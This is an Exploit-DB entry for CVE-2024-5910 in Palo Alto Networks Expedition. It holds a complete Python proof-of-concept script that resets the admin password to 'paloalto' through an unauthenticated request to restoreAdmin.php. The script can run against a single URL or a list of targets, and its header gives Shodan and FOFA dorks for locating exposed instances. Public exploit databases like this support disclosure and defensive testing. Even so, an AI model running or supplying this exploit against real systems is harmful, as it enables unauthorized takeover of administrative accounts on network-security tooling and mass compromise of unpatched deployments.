Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

EDB-ID:

52129

CVE:

2024-5910

EDB Verified:

Author:

ByteHunter

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2025-04-06

Vulnerable App: 
################################################################################################
############################                                                                   #
#- Exploit Title: PoC for Admin Account Password Reset of Palo Alto Networks Expedition tool   #
#- Shodan Dork: html:"expedition project"                                                      #     
#- FOFA Dork: "expedition project" && icon_hash="1499876150"                                   #
#- Exploit Author: ByteHunter                                                                  #
#- Email: 0xByteHunter@proton.me                                                               #
#- Vulnerable Versions: 1.2 < 1.2.92                                                           #
#- Tested on: 1.2.90.1 & 1.2.75                                                                #
#- CVE : CVE-2024-5910                                                                         #                             
############################                                                                   #  
################################################################################################ 

import requests
import argparse
import warnings

from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter("ignore", InsecureRequestWarning)

ENDPOINT = '/OS/startup/restore/restoreAdmin.php'

def send_request(base_url):
    url = f"{base_url}{ENDPOINT}"
    print(f"Testing URL: {url}")  
    try:
        response = requests.get(url, verify=False, timeout=7) 
        if response.status_code == 200:
            print("✓ Admin password restored to: 'paloalto'\n")
            print("✓ admin panel is now accessable via ==> admin:paloalto creds")
        else:
            print(f"Request failed with status code: {response.status_code}\n")
    except requests.exceptions.RequestException as e:
        print(f"Error sending request to {url}") #{e}

def main():
    parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
    parser.add_argument('-u', '--url', type=str, help='single target URL')
    parser.add_argument('-l', '--list', type=str, help='URL target list')

    args = parser.parse_args()

    if args.url:
        send_request(args.url)
    elif args.list:
        try:
            with open(args.list, 'r') as file:
                urls = file.readlines()
                for base_url in urls:
                    send_request(base_url.strip())
        except FileNotFoundError:
            print(f"File not found: {args.list}")
    else:
        print("I need a URL address with -u or a URL file list with -l.")

if __name__ == '__main__':
    main()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services